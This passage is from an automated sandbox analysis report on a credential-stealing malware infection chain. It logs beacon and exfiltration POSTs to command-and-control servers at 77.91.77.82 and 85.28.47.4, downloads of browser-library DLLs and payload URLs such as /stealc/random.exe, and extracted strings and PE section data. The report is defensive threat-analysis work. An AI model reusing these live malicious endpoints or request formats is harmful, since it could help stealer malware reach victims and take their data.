Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 77.91.77.81 77.91.77.81
Source: Joe Sandbox View	IP Address: 85.28.47.4 85.28.47.4

Source: Joe Sandbox View	ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: Joe Sandbox View	ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View	ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU

Source: unknown	DNS traffic detected: query: 86.23.85.13.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.4

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 14_2_009BBD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

14_2_009BBD30

Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 86.23.85.13.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"jony------IDAAKEHJDHJKEBFHJEGD--

Source: file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: file.exe, 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.91.77.81/cost/go.exeAppData
Source: file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: file.exe, 00000000.00000002.2622413487.0000000000406000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.91.77.81/mine/amadka.exepera
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/stealc/random.exe506iN
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/stealc/random.exeer
Source: explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000E.00000002.3408169203.000000000079B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php.
Source: explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/
Source: explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php3
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpH
Source: explorti.exe, 0000000E.00000002.3408169203.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpV
Source: explorti.exe, 0000000E.00000002.3408169203.000000000079B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phplF
Source: explorti.exe, 0000000E.00000002.3408169203.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpmp
Source: explorti.exe, 0000000E.00000002.3408169203.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu
Source: file.exe, 00000000.00000002.2623849094.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, 7873c16243.exe, 0000000F.00000002.2839628750.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dlljk
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll(
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dllpk
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll_k
Source: file.exe, 00000000.00000002.2623849094.000000000165F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: file.exe, 00000000.00000002.2623849094.000000000165F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:-
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/920475a59bac849d.php-
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpon
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.4/EM32
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 7873c16243.exe.14.dr, random[1].exe.14.dr	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: file.exe, 7873c16243.exe.14.dr, random[1].exe.14.dr	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: file.exe, 7873c16243.exe.14.dr, random[1].exe.14.dr	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2652517990.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2639965236.000000001CD56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://support.mozilla.org
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2493788563.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDA.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://www.mozilla.org
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: file.exe, 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2622413487.00000000003A8000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000002.2622413487.00000000004AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: CGDBFBGIDHCAAKEBAKFIIIEBAA.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2623849094.0000000001777000.00000004.00000020.00020000.00000000.sdmp, HJJEGIEHIJKKFIDHDGID.0.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary

PE file contains section with special chars

Source: BAFIEGIECG.exe.0.dr	Static PE information: section name:
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name: .idata
Source: BAFIEGIECG.exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name: .idata
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: explorti.exe.10.dr	Static PE information: section name:
Source: explorti.exe.10.dr	Static PE information: section name: .idata
Source: explorti.exe.10.dr	Static PE information: section name:

PE file has nameless sections

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
Source: 7873c16243.exe.14.dr	Static PE information: section name:
